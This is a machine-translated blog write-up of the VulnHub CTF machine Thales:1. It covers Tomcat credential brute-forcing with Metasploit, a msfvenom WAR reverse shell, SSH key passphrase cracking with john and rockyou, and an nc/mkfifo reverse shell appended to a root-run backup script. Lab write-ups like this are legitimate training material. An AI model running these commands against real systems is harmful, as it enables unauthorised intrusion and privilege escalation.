当前位置:网站首页>[vulnhub range] thales:1

[vulnhub range] thales:1

2022-07-07 16:24:00 Nailaoyyds

Catalog

Preface

describe

One 、 information gathering

0x00 arp-scan scanning

0x01 nmap scanning

Two 、 Exploit

0x00 msfconsole utilize

0x01 Upload files

3、 ... and 、 Elevated privileges

0x00 rebound shell

0x02 Dictionary explosion ​ edit

0x03 user.txt

0x04 rebound shell

0x05 root.txt

summary

Preface

describe

brief introduction : Open your eyes , Another angle

Include 2 A sign :user.txt and root.txt.

Download link

https://download.vulnhub.com/thales/Thales.zip.torrent

0x00 Introduction to the environment 
kali  192.168.56.102
Thales Drone aircraft   192.168.56.101

One 、 information gathering

0x00 arp-scan scanning 

arp-scan -I eth1 -l
# Scan network card LAN

0x01 nmap scanning 

 Scan to two network segments 
 Not sure which 
nmap  Scan scan two IP

 Open ports 22 and 8080

Visit Site , User name and password are required

Two 、 Exploit

0x00 msfconsole utilize 

msf Search for tomcat login

 To configure payload

 user name    tomcat
​
 password      role1

 Login successfully

0x01 Upload files

Look for function points , Found the upload point 

 utilize kali Generate war File Trojan do rebound shell
msfvenom -p java/jsp_shell_reverse_tcp lhost=192.168.56.102 lport=5555  -f war -o myshell.war

Upload successful , And run

3、 ... and 、 Elevated privileges

0x00 rebound shell

Listening port 

 Upgrade transaction mutual shell

sudo -l  # Need a password , Unknown 
 stay home User found under file Thales

 stay `notes.txt` Found in the file `/usr/local/bin/backup.sh
 View file contents

0x02 Dictionary explosion

Find out .ssh Folder

It is found that the private key can be used ssh2john.py Generate password file explosion

use ssh2john.py Compile the script 

/usr/share/john/ssh2john.py id_rsa > crack.txt

 john --wordlist=/usr/share/wordlists/rockyou.txt crack.txt

Burst out the code vodka06

Switching users

0x03 user.txt

see user.txt--- first flag

notes.txt yes root The powers of the , There may be something inside

0x04 rebound shell

notice backup.sh It has executive authority , Can write bounce shell

echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.56.102 666 >/tmp/f" >> backup.sh

File content editing will directly replace , Append for selection 

echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.56.102 9999 >/tmp/f" >> backup.sh

0x05 root.txt

monitor 9999, After writing, you will connect by yourself

summary

Thales Learned

msf The use of blasting dictionary

rsa Use of private key ciphertext

原网站

版权声明
本文为[Nailaoyyds]所创,转载请带上原文链接,感谢
https://yzsam.com/2022/188/202207071412116265.html

边栏推荐

猜你喜欢

随机推荐